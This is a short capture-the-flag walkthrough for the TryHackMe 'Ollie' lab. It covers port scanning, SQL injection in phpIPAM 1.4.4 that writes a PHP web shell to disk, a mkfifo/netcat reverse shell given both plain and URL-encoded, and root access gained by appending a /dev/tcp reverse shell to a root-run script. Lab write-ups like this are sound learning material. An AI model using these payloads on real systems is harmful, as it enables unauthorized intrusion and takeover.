Apr 18
TryHackMe: Ollie
Today we will take a look at TryHackMe: Ollie. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Network scan
Command: sudo nmap -sT -p- -T5 -vv -oN nmap/all_ports 10.10.86.146
1337 port Enumeration
Command: nc IP 1337
Yes, this is a simple chat correspondence. In the end, we get the necessary credential
I tried to log in to Ollie with SSH, but it didn’t work.
Let’s take a look at the website now.
It is a simple login page. Let’s enter with the credential we have.
I did research on phpIPAM. And it turned out that version 1.4.4 has a vulnerability to sql injection.
Let’s check here
Go to the Routing section
Go to the example in the Peer Name section. Click the Actions button and select Subnet mapping
Now let’s check the vulnerability.
Command: “union select @@version,2,user(),4 — -
It works. Now let’s create rce
Command: “ union select null,null,null,”<?php system($_GET[‘cmd’]); ?>” into outfile “/var/www/html/backdoor.php” — -
Reverse shell weed. But keep in mind that you need to encode the url as you type in the url section.
Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f
rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20IP%204242%20%3E%2Ftmp%2Ff%0A
As soon as I received the reverse shell, I changed the user using the previous data.
Privilege Escalation
Command: find / -group ollie 2>/dev/null
There are some interesting results. But this was the most interesting.
After checking it, I saw that it works as root, and I used it to enter the reverse shell command.
Command: echo ‘bash -i >& /dev/tcp/IP/4444 0>&1’ >> /usr/bin/feedme
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”
